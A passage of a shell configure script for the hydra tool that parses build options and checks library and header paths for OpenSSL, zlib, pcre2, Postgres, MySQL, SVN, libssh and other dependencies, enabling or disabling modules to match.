[ \"X\" = \"X$FHS\" ]; then\n \t FHS_TMP=`echo \"$1\"|sed 's/.*--fhs//'`\n\t if [ -z \"$FHS_TMP\" ]; then\n\t\t FHS=\"yes\"\n\t fi\n fi\n if [ \"X\" = \"X$DEBUG\" ]; then\n \t DEBUG_TMP=`echo \"$1\"|sed 's/.*--debug//'`\n\t if [ -z \"$DEBUG_TMP\" ]; then\n\t\t DEBUG=\"yes\"\n\t fi\n fi\n if [ \"X\" = \"X$XHYDRA_SUPPORT\" ]; then\n XHYDRA_SUPPORT_TMP=`echo \"$1\"|sed 's/.*--disable-xhydra//'`\n if [ -z \"$XHYDRA_SUPPORT_TMP\" ]; then\n\t XHYDRA_SUPPORT=\"disable\"\n fi\n fi\n if [ \"X\" = \"X$WORACLE_PATH\" ]; then\n \t WORACLE_PATH_TMP=`echo \"$1\"|sed 's/.*--with-oracle=//'`\n\t if [ \"$WORACLE_PATH_TMP\" != \"$1\" ]; then\n\t\t WORACLE_PATH=\"$WORACLE_PATH_TMP\"\n\t fi\n fi\n if [ \"X\" = \"X$WORACLE_LIB_PATH\" ]; then\n \t WORACLE_LIB_PATH_TMP=`echo \"$1\"|sed 's/.*--with-oracle-lib=//'`\n\t if [ \"$WORACLE_LIB_PATH_TMP\" != \"$1\" ]; then\n\t\t WORACLE_LIB_PATH=\"$WORACLE_LIB_PATH_TMP\"\n\t fi\n fi\n shift\n done\nfi\n\necho\necho \"Starting hydra auto configuration ...\"\nrm -f Makefile.in\nSYSS=`uname -s 2> /dev/null`\nSYSO=`uname -o 2> /dev/null`\nSYSM=`uname -m 2> /dev/null`\nif [ \"$SYSS\" = \"Linux\" -o \"$SYSS\" = \"OpenBSD\" -o \"$SYSS\" = \"FreeBSD\" -o \"$SYSS\" = \"NetBSD\" -o \"$SYSS\" = \"Darwin\" ]; then\n SF=`uname -m | grep 64`\n if [ `uname -m` = \"s390x\" ]; then\n SF=64\n fi\n if [ \"x$SF\" = \"x\" ]; then\n SIXFOUR=\"\"\n echo Detected 32 Bit $SYSS OS\n else\n SIXFOUR=64\n echo Detected 64 Bit $SYSS OS\n fi\nfi\n# On macOS /usr/include only exists if one has installed the Command Line Tools package.\n# If this is an Xcode-only system we need to look inside the SDK for headers.\nSDK_PATH=\"\"\nif [ \"$SYSS\" = \"Darwin\" -a ! -d \"/usr/include\" ]; then\n SDK_PATH=`xcrun --show-sdk-path`\nfi\nLIBDIRS=`cat /etc/ld.so.conf /etc/ld.so.conf.d/* 2> /dev/null | grep -v '^#' | sort | uniq`\nif [ \"$SIXFOUR\" = \"64\" ]; then\n LIBDIRS=\"$LIBDIRS /lib64 /usr/lib64 /usr/local/lib64 /opt/local/lib64\"\nfi\nif [ -d \"/Library/Developer/CommandLineTools/usr/lib\" ]; then\n LIBDIRS=\"$LIBDIRS /Library/Developer/CommandLineTools/usr/lib /Library/Developer/CommandLineTools/lib\"\nfi\nLIBDIRS=\"$LIBDIRS /lib /usr/lib /usr/local/lib /opt/local/lib /mingw64/lib /mingw64/bin\"\nINCDIRS=\"$SDK_PATH/usr/include /usr/local/include /opt/include /opt/local/include /mingw64/include\"\nif [ -n \"$PREFIX\" ]; then\n if [ -d \"$PREFIX/lib\" ]; then\n LIBDIRS=\"$LIBDIRS $PREFIX/lib\"\n fi\n if [ -d \"$PREFIX/include\" ]; then\n INCDIRS=\"$INCDIRS $PREFIX/include\"\n fi\nfi\nSTRIP=\"strip\"\necho\n\necho \"Checking for zlib (libz/zlib.h) ...\"\nfor i in $INCDIRS; do\n if [ -f \"$i/zlib.h\" ]; then\n\tHAVE_ZLIB=\"y\"\n fi\ndone\n\nif [ -n \"$HAVE_ZLIB\" ]; then\n echo \" ... found\"\nelse\n echo \" ... zlib not found, gzip support disabled\"\nfi\n\necho \"Checking for sybdb (sybdb.h) ...\"\nfor i in $INCDIRS; do\n if [ -f \"$i/sybdb.h\" ]; then\n\tHAVE_SYBDB=\"y\"\n fi\ndone\n\nif [ -n \"$HAVE_SYBDB\" ]; then\n echo \" ... found\"\nelse\n echo \" ... sybdb not found, MSSQL module will lack TDSv7 support\"\nfi\n\necho \"Checking for sybfront (sybfront.h) ...\"\nfor i in $INCDIRS; do\n if [ -f \"$i/sybfront.h\" ]; then\n\tHAVE_SYBFRONT=\"y\"\n fi\ndone\n\nif [ -n \"$HAVE_SYBFRONT\" ]; then\n echo \" ... found\"\nelse\n echo \" ... sybfront not found, MSSQL module will lack TDSv7 support\"\nfi\n\necho \"Checking for openssl (libssl/libcrypto/ssl.h/sha.h) ...\"\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: SSL_LIB=$LIBDIRS `ls -d /*ssl /usr/*ssl /opt/*ssl /usr/local/*ssl /opt/local/*ssl /*ssl/lib /usr/*ssl/lib /opt/*ssl/lib /usr/local/*ssl/lib /opt/local/*ssl/lib 2> /dev/null`\n echo DEBUG: SSL_INC=$INCDIRS `ls -d /*ssl/include /opt/*ssl/include /usr/*ssl/include /usr/local/*ssl/include 2> /dev/null`\nfi\n\nif [ \"X\" != \"X$WSSL_LIB_PATH\" ]; then\n SSL_PATH=\"$i\"\n CRYPTO_PATH=\"$i\"\nelse\n for i in $LIBDIRS \\\n /*ssl /usr/*ssl /opt/*ssl /usr/local/*ssl /opt/local/*ssl \\\n /*ssl/lib /usr/*ssl/lib /opt/*ssl/lib /usr/local/*ssl/lib /opt/local/*ssl/lib\n do\n if [ \"X\" = \"X$SSL_PATH\" ]; then\n if [ -f \"$i/libssl.so\" -o -f \"$i/libssl.dylib\" -o -f \"$i/libssl.a\" ]; then\n SSL_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SSL_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libssl.so* /bin/cygssl*.dll 2> /dev/null | grep ssl`\n if [ -n \"$TMP_LIB\" ]; then\n SSL_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$CRYPTO_PATH\" ]; then\n if [ -f \"$i/libcrypto.so\" -o -f \"$i/libcrypto.dylib\" -o -f \"$i/libcrypto.a\" ]; then\n CRYPTO_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$CRYPTO_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libcrypto.so* /bin/cygcrypto*.dll 2> /dev/null | grep crypto`\n if [ -n \"$TMP_LIB\" ]; then\n CRYPTO_PATH=\"$i\"\n fi\n fi\n done\nfi\n\nSSLNEW=\"\"\nif [ \"X\" = \"X$SSL_PATH\" ]; then\n SSL_PATH=\"$i\"\n SSLNEW=`grep SHA256_CTX $i/openssl/sha.h 2> /dev/null`\nelse\n for i in $INCDIRS /*ssl/include /opt/*ssl/include /usr/*ssl/include /usr/local/*ssl/include\n do\n if [ \"X\" = \"X$SSL_IPATH\" ]; then\n if [ -f \"$i/openssl/ssl.h\" ]; then\n SSL_IPATH=\"$i\"\n SSLNEW=`grep SHA256_CTX $i/openssl/sha.h 2> /dev/null`\n fi\n fi\n done\nfi\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: SSL_PATH=$SSL_PATH/libssl\n echo DEBUG: CRYPTO_PATH=$CRYPTO_PATH/libcrypto\n echo DEBUG: SSL_INC=$SSL_IPATH/openssl/ssl.h\nfi\n\nif [ \"X\" = \"X$SSL_PATH\" ]; then\n SSL_IPATH=\"\"\n CRYPTO_PATH=\"\"\nfi\nif [ \"X\" = \"X$SSL_IPATH\" ]; then\n SSL_PATH=\"\"\n CRYPTO_PATH=\"\"\nfi\nif [ -n \"$SSL_PATH\" -a \"X\" = \"X$SSLNEW\" ]; then\n echo \" ... found but OLD\"\n echo \"NOTE: your OpenSSL package is outdated, update it!\"\nfi\nif [ -n \"$SSL_PATH\" -a '!' \"X\" = \"X$SSLNEW\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$SSL_PATH\" ]; then\n echo \" ... NOT found, SSL support disabled\"\n echo \"Get it from http://www.openssl.org\"\nfi\nif [ \"$SSL_IPATH\" = \"/usr/include\" ]; then\n SSL_IPATH=\"\"\nfi\n\necho \"Checking for gcrypt (libgcrypt/gpg-error.h) ...\"\nfor i in $LIBDIRS ; do\n if [ -f \"$i/libgcrypt.so\" -o -f \"$i/libgcrypt.dylib\" -o -f \"$i/libgcrypt.a\" -o -f \"$i/libgcrypt.dll.a\" -o -f \"$i/libgcrypt.la\" ]; then\n\t HAVE_GCRYPT=\"y\"\n fi\ndone\n\nfor i in $INCDIRS ; do\n if [ \"X\" = \"X$GPGERROR_IPATH\" ]; then\n TMP_PATH=`/bin/ls $i/$SYSM*/gpg-error.h 2> /dev/null`\n if [ -n \"$TMP_PATH\" ]; then\n GPGERROR_IPATH=\"$i\"\n else\n if [ -f \"$i/gpg-error.h\" ]; then\n GPGERROR_IPATH=\"$i\"\n fi\n fi\n fi\ndone\n\nif [ -n \"$HAVE_GCRYPT\" -a \"X\" != \"X$GPGERROR_IPATH\" ]; then\n echo \" ... found\"\nelse\n echo \" ... gcrypt not found, radmin2 module disabled\"\n HAVE_GCRYPT=\"\"\nfi\n\necho \"Checking for idn (libidn) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$IDN_PATH\" ]; then\n if [ -f \"$i/libidn.so\" -o -f \"$i/libidn.dylib\" -o -f \"$i/libidn.a\" -o -f \"$i/libidn.dll.a\" -o -f \"$i/libidn.la\" ]; then\n IDN_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$IDN_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libidn.so* /bin/libidn*.dll 2> /dev/null | grep ssl`\n if [ -n \"$TMP_LIB\" ]; then\n IDN_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" != \"X$IDN_PATH\" ]; then\n if [ -f \"$i/stringprep.h\" ]; then\n IDN_IPATH=\"$i\"\n fi\n fi\n if [ \"X\" != \"X$IDN_PATH\" ]; then\n if [ -f \"$i/pr29.h\" ]; then\n PR29_IPATH=\"$i\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: IDN_PATH=$IDN_PATH/libidn\n echo DEBUG: IDN_IPATH=$IDN_IPATH/stringprep.h\n echo DEBUG: PR29_IPATH=$PR29_IPATH/pr29.h\nfi\nif [ -n \"$IDN_PATH\" -a -n \"$IDN_IPATH\" ]; then\n echo \" ... found\"\nfi\n#pr29 is optional\nif [ \"X\" = \"X$IDN_PATH\" -o \"X\" = \"X$IDN_IPATH\" ]; then\n echo \" ... NOT found, unicode logins and passwords will not be supported\"\n IDN_PATH=\"\"\n IDN_IPATH=\"\"\n PR29_IPATH=\"\"\nfi\n\necho \"Checking for curses (libcurses/term.h) ...\"\nfor i in $LIBDIRS; do\n if [ \"X\" = \"X$CURSES_PATH\" ]; then\n if [ -f \"$i/libcurses.so\" -o -f \"$i/libcurses.dylib\" -o -f \"$i/libcurses.a\" ]; then\n CURSES_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$CURSES_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libcurses.so.* 2> /dev/null | grep curses.`\n if [ -n \"$TMP_LIB\" ]; then\n CURSES_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$CURSES_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libcurses.dll* 2> /dev/null | grep curses.`\n if [ -n \"$TMP_LIB\" ]; then\n CURSES_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" != \"X$CURSES_PATH\" ]; then\n if [ -f \"$i/term.h\" ]; then\n CURSES_IPATH=\"$i\"\n fi\n if [ -f \"$i/ncurses/term.h\" ]; then\n CURSES_IPATH=\"$i/ncurses\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: CURSES_PATH=$CURSES_PATH/libcurses\n echo DEBUG: CURSES_IPATH=$CURSES_IPATH/term.h\nfi\nif [ -n \"$CURSES_PATH\" -a -n \"$CURSES_IPATH\" ]; then\n echo \" ... found, color output enabled\"\nfi\nif [ \"X\" = \"X$CURSES_PATH\" -o \"X\" = \"X$CURSES_IPATH\" ]; then\n echo \" ... NOT found, color output disabled\"\n CURSES_PATH=\"\"\n CURSES_IPATH=\"\"\nfi\n\necho \"Checking for pcre2 (libpcre/pcre.h) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$PCRE_PATH\" ]; then\n if [ -f \"$i/libpcre2-8.so\" -o -f \"$i/libpcre2-8.dylib\" -o -f \"$i/libpcre2-8.a\" ]; then\n PCRE_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$PCRE_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libpcre2*.so* 2> /dev/null | grep libpcre.`\n if [ -n \"$TMP_LIB\" ]; then\n PCRE_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$PCRE_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libpcre2*.dll* 2> /dev/null | grep libpcre.`\n if [ -n \"$TMP_LIB\" ]; then\n PCRE_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" != \"X$PCRE_PATH\" ]; then\n if [ -f \"$i/pcre2.h\" ]; then\n PCRE_IPATH=\"$i\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: PCRE_PATH=$PCRE_PATH/libpcre\n echo DEBUG: PCRE_IPATH=$PCRE_IPATH/pcre2.h\nfi\nif [ -n \"$PCRE_PATH\" -a -n \"$PCRE_IPATH\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$PCRE_PATH\" -o \"X\" = \"X$PCRE_IPATH\" ]; then\n echo \" ... NOT found, server response checks will be less reliable\"\n PCRE_PATH=\"\"\n PCRE_IPATH=\"\"\nfi\n\necho \"Checking for Postgres (libpq/libpq-fe.h) ...\"\n#if [ \"$SYSO\" = \"Cygwin\" ]; then\n# echo \" ... DISABLED - postgres is buggy in Cygwin at the moment\"\n# POSTGRES_PATH=\"\"\n# POSTGRES_IPATH=\"\"\n#else\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$POSTGRES_PATH\" ]; then\n if [ -f \"$i/libpq.so\" -o -f \"$i/libpq.dylib\" -o -f \"$i/libpq.a\" ]; then\n POSTGRES_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$POSTGRES_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libpq.so* 2> /dev/null | grep pq`\n if [ -n \"$TMP_LIB\" ]; then\n POSTGRES_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$POSTGRES_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libpq.dll* 2> /dev/null | grep pq`\n if [ -n \"$TMP_LIB\" ]; then\n POSTGRES_PATH=\"$i\"\n fi\n fi\n done\n POSTGRES_IPATH=\n for i in $INCDIRS \\\n /opt/p*sql*/include /usr/*p*sql*/include /usr/local/*psql*/include /mingw64/include\n do\n if [ \"X\" = \"X$POSTGRES_IPATH\" ]; then\n if [ -f \"$i/libpq-fe.h\" ]; then\n POSTGRES_IPATH=\"$i\"\n fi\n if [ -f \"$i/pgsql/libpq-fe.h\" ]; then\n POSTGRES_IPATH=\"$i/pgsql\"\n fi\n if [ -f \"$i/postgresql/libpq-fe.h\" ]; then\n POSTGRES_IPATH=\"$i/postgresql\"\n fi\n fi\n done\n\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: POSTGRES_PATH=$POSTGRES_PATH/libpq\n echo DEBUG: POSTGRES_IPATH=$POSTGRES_IPATH/libpq-fe.h\nfi\n if [ -n \"$POSTGRES_PATH\" -a -n \"$POSTGRES_IPATH\" ]; then\n echo \" ... found\"\n fi\n if [ \"X\" = \"X$POSTGRES_PATH\" -o \"X\" = \"X$POSTGRES_IPATH\" ]; then\n echo \" ... NOT found, module postgres disabled\"\n POSTGRES_PATH=\"\"\n POSTGRES_IPATH=\"\"\n fi\n#fi\n\necho \"Checking for SVN (libsvn_client-1/libapr-1/libaprutil-1) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$SVN_PATH\" ]; then\n if [ -f \"$i/libsvn_client-1.so\" ]; then\n SVN_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$APR_PATH\" ]; then \n if [ -f \"$i/libapr-1.so\" -a -f \"$i/libaprutil-1.so\" ]; then\n\t APR_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SVN_PATH\" ]; then\n if [ -f \"$i/libsvn_client-1.dll.a\" ]; then\n SVN_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$APR_PATH\" ]; then \n if [ -f \"$i/libapr-1.dll.a\" -a -f \"$i/libaprutil-1.dll.a\" ]; then\n\t APR_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SVN_PATH\" ]; then\n if [ -f \"$i/libsvn_client-1.dylib\" ]; then\n SVN_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$APR_PATH\" ]; then \n if [ -f \"$i/libapr-1.dylib\" -a -f \"$i/libaprutil-1.dylib\" ]; then\n\t APR_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SVN_PATH\" ]; then\n if [ -f \"$i/libsvn_client-1.a\" ]; then\n SVN_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$APR_PATH\" ]; then \n if [ -f \"$i/libapr-1.a\" -a -f \"$i/libaprutil-1.a\" ]; then\n\t APR_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SVN_PATH\" ]; then\n if [ -f \"$i/libsvn_client-1.0.dylib\" ]; then\n SVN_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$APR_PATH\" ]; then \n if [ -f \"$i/libapr-1.0.dylib\" -a -f \"$i/libaprutil-1.0.dylib\" ]; then\n\t APR_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SVN_PATH\" ]; then\n TMP_LIB1=`/bin/ls $i/libsvn_client*.so* 2> /dev/null | grep libsvn_client.`\n if [ -n \"$TMP_LIB1\" ]; then\n SVN_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$APR_PATH\" ]; then \n TMP_LIB2=`/bin/ls $i/libapr-1*.so* 2> /dev/null | grep libsvn_client.`\n TMP_LIB3=`/bin/ls $i/libaprutil-1*.so* 2> /dev/null | grep libsvn_client.`\n if [ -n \"$TMP_LIB2\" -a -n \"$TMP_LIB3\" ]; then\n\t APR_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SVN_PATH\" ]; then\n TMP_LIB1=`/bin/ls $i/libsvn_client*.dll* 2> /dev/null | grep libsvn_client.`\n if [ -n \"$TMP_LIB1\" ]; then\n SVN_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$APR_PATH\" ]; then \n TMP_LIB2=`/bin/ls $i/libapr-1*.dll* 2> /dev/null | grep libsvn_client.`\n TMP_LIB3=`/bin/ls $i/libaprutil-1*.dll* 2> /dev/null | grep libsvn_client.`\n if [ -n \"$TMP_LIB2\" -a -n \"$TMP_LIB3\" ]; then\n\t APR_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" = \"X$SVN_IPATH\" ]; then\n if [ -d \"$i/subversion-1\" ]; then\n SVN_IPATH=\"$i/subversion-1\"\n fi\n if [ -d \"$i/svn\" ]; then\n SVN_IPATH=\"$i/svn\"\n fi\n fi \n if [ \"X\" = \"X$APR_IPATH\" ]; then\n if [ -d \"$i/apr-1.0\" ]; then\n APR_IPATH=\"$i/apr-1.0\"\n fi\n if [ -d \"$i/apr-1\" ]; then\n APR_IPATH=\"$i/apr-1\"\n fi\n if [ -d \"$i/apr\" ]; then\n APR_IPATH=\"$i/apr\"\n fi\n fi \ndone\nSYS_PARAM=\"\"\nif [ -f \"$SDK_PATH/usr/include/sys/param.h\" ]; then\n SYS_PARAM=-DHAVE_SYS_PARAM_H\nfi\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: SVN_PATH=$SVN_PATH/libsvn_client-1\n echo DEBUG: APR_PATH=$APR_PATH/libapr\n echo DEBUG: SVN_IPATH=$APR_IPATH/\n echo DEBUG: APR_IPATH=$APR_IPATH/\nfi\n\nif [ \"X\" = \"X$SVN_PATH\" -o \"X\" = \"X$SVN_IPATH\" -o \"X\" = \"X$APR_IPATH\" ]; then\n SVN_PATH=\"\"\n SVN_IPATH=\"\"\n APR_IPATH=\"\"\nfi\nif [ \"$SVN_IPATH\" = \"/usr/include\" ]; then\n SVN_IPATH=\"\"\nfi\nif [ \"$APR_IPATH\" = \"/usr/include\" ]; then\n APR_IPATH=\"\"\nfi\n\nif [ -n \"$SVN_PATH\" -a -n \"$APR_PATH\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$SVN_PATH\" -o \"X\" = \"X$APR_PATH\" ]; then\n echo \" ... NOT found, module svn disabled\"\nfi\n\necho \"Checking for firebird (libfbclient) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$FIREBIRD_PATH\" ]; then\n if [ -f \"$i/libfbclient.so\" -o -f \"$i/libfbclient.dylib\" -o -f \"$i/libfbclient.a\" ]; then\n FIREBIRD_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$FIREBIRD_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libfbclient.so.* 2> /dev/null | grep libfbclient.`\n if [ -n \"$TMP_LIB\" ]; then\n FIREBIRD_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$FIREBIRD_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libfbclient.dll* 2> /dev/null | grep libfbclient.`\n if [ -n \"$TMP_LIB\" ]; then\n FIREBIRD_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" != \"X$FIREBIRD_PATH\" ]; then\n if [ -f \"$i/ibase.h\" ]; then\n FIREBIRD_IPATH=\"$i\"\n fi\n if [ -f \"$i/firebird/ibase.h\" ]; then\n FIREBIRD_IPATH=\"$i/firebird\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: FIREBIRD_PATH=$FIREBIRD_PATH/libfbclient\n echo DEBUG: FIREBIRD_IPATH=$FIREBIRD_IPATH/ibase.h\nfi\nif [ -n \"$FIREBIRD_PATH\" -a -n \"$FIREBIRD_IPATH\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$FIREBIRD_PATH\" -o \"X\" = \"X$FIREBIRD_IPATH\" ]; then\n echo \" ... NOT found, module firebird disabled\"\n FIREBIRD_PATH=\"\"\n FIREBIRD_IPATH=\"\"\nfi\n\necho \"Checking for MYSQL client (libmysqlclient/math.h) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$MYSQL_PATH\" ]; then\n if [ -f \"$i/libmysqlclient.so\" -o -f \"$i/libmysqlclient.dylib\" -o -f \"$i/libmysqlclient.a\" ]; then\n MYSQL_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$MYSQL_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libmysqlclient.so.* 2> /dev/null | grep libmysqlclient.`\n if [ -n \"$TMP_LIB\" ]; then\n MYSQL_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$MYSQL_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libmysqlclient.dll* 2> /dev/null | grep libmysqlclient.`\n if [ -n \"$TMP_LIB\" ]; then\n MYSQL_PATH=\"$i\"\n fi\n fi\ndone\nMYSQLINSUBDIR=\"\"\nfor i in $INCDIRS ; do\n if [ \"X\" != \"X$MYSQL_PATH\" ]; then\n if [ -f \"$i/mysql/mysql.h\" ]; then\n MYSQL_IPATH=\"$i/mysql\"\n MYSQLINSUBDIR=\"mysql/\"\n fi\n if [ -f \"$i/mysql.h\" ]; then\n MYSQL_IPATH=\"$i\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: MYSQL_PATH=$MYSQL_PATH/libmysqlclient\n echo DEBUG: MYSQL_IPATH=$MYSQL_IPATH/mysql.h\nfi\nMATH=\"\"\nif [ -f \"$SDK_PATH/usr/include/math.h\" ]; then\n MATH=\"-DHAVE_MATH_H\"\n if [ -n \"$MYSQL_PATH\" -a -n \"$MYSQL_IPATH\" -a -n \"$MATH\" ]; then\n echo \" ... found\"\n else\n echo \" ... NOT found, module Mysql will not support version > 4.x\"\n MYSQL_PATH=\"\"\n MYSQL_IPATH=\"\"\n fi\nelse\n echo \" ... math.h not found, module Mysql disabled\"\nfi\necho \"Checking for AFP (libafpclient) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$AFP_PATH\" ]; then\n if [ -f \"$i/libafpclient.so\" -o -f \"$i/libafpclient.so\" -o -f \"$i/libafpclient.a\" ]; then\n AFP_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$AFP_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libafpclient.so.* 2> /dev/null | grep libafpclient.`\n if [ -n \"$TMP_LIB\" ]; then\n AFP_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$AFP_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libafpclient.dll* 2> /dev/null | grep libafpclient.`\n if [ -n \"$TMP_LIB\" ]; then\n AFP_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" != \"X$AFP_PATH\" ]; then\n if [ -f \"$i/afpfs-ng/afp.h\" ]; then\n AFP_IPATH=\"$i/afpfs-ng\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: AFP_PATH=$AFP_PATH/libafpclient\n echo DEBUG: AFP_IPATH=$AFP_IPATH/afp.h\nfi\nif [ -n \"$AFP_PATH\" -a -n \"$AFP_IPATH\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$AFP_PATH\" -o \"X\" = \"X$AFP_IPATH\" ]; then\n echo \" ... NOT found, module Apple Filing Protocol disabled - Apple sucks anyway\"\n AFP_PATH=\"\"\n AFP_IPATH=\"\"\nfi\n\necho \"Checking for NCP (libncp/nwcalls.h) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$NCP_PATH\" ]; then\n if [ -f \"$i/libncp.so\" -o -f \"$i/libncp.dylib\" -o -f \"$i/libncp.a\" ]; then\n NCP_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$NCP_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libncp.so.* 2> /dev/null | grep ncp.`\n if [ -n \"$TMP_LIB\" ]; then\n NCP_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$NCP_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libncp.dll* 2> /dev/null | grep ncp.`\n if [ -n \"$TMP_LIB\" ]; then\n NCP_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" != \"X$NCP_PATH\" ]; then\n if [ -f \"$i/ncp/nwcalls.h\" ]; then\n NCP_IPATH=\"$i\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: NCP_PATH=$NCP_PATH/libncp\n echo DEBUG: NCP_IPATH=$NCP_IPATH/ncp/nwcalls.h\nfi\nif [ -n \"$NCP_PATH\" -a -n \"$NCP_IPATH\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$NCP_PATH\" -o \"X\" = \"X$NCP_IPATH\" ]; then\n echo \" ... NOT found, module NCP disabled\"\n NCP_PATH=\"\"\n NCP_IPATH=\"\"\nfi\n\necho \"Checking for SAP/R3 (librfc/saprfc.h) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$SAPR3_PATH\" ]; then\n if [ -f \"$i/librfc.a\" -o -f \"$i/librfc.dylib\" -o \"$i/librfc32.dll\" ]; then\n SAPR3_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SAPR3_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/librfc.* $i/librfc32.* 2> /dev/null | grep librfc`\n if [ -n \"$TMP_LIB\" ]; then\n SAPR3_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" = \"X$SAPR3_IPATH\" ]; then\n if [ -f \"$i/saprfc.h\" ]; then\n SAPR3_IPATH=\"$i\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: SAPR3_PATH=$SAPR3_PATH/librfc\n echo DEBUG: SAPR3_IPATH=$SAPR3_IPATH/saprfc.h\nfi\nif [ \"X\" = \"X$SAPR3_PATH\" ]; then\n SAPR3_IPATH=\"\"\nfi\nif [ \"X\" = \"X$SAPR3_IPATH\" ]; then\n SAPR3_PATH=\"\"\nfi\nif [ -n \"$SAPR3_PATH\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$SAPR3_PATH\" ]; then\n echo \" ... NOT found, module sapr3 disabled\"\n echo \"Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp\"\nfi\nif [ \"$SAPR3_IPATH\" = \"/usr/include\" ]; then\n SAPR3_IPATH=\"\"\nfi\n\necho \"Checking for libssh (libssh/libssh.h) ...\"\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$SSH_PATH\" ]; then\n if [ -f \"$i/libssh.so\" -o -f \"$i/libssh.dylib\" -o -f \"$i/libssh.a\" ]; then\n SSH_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SSH_PATH\" ]; then\n TMP_LIB=`/bin/ls 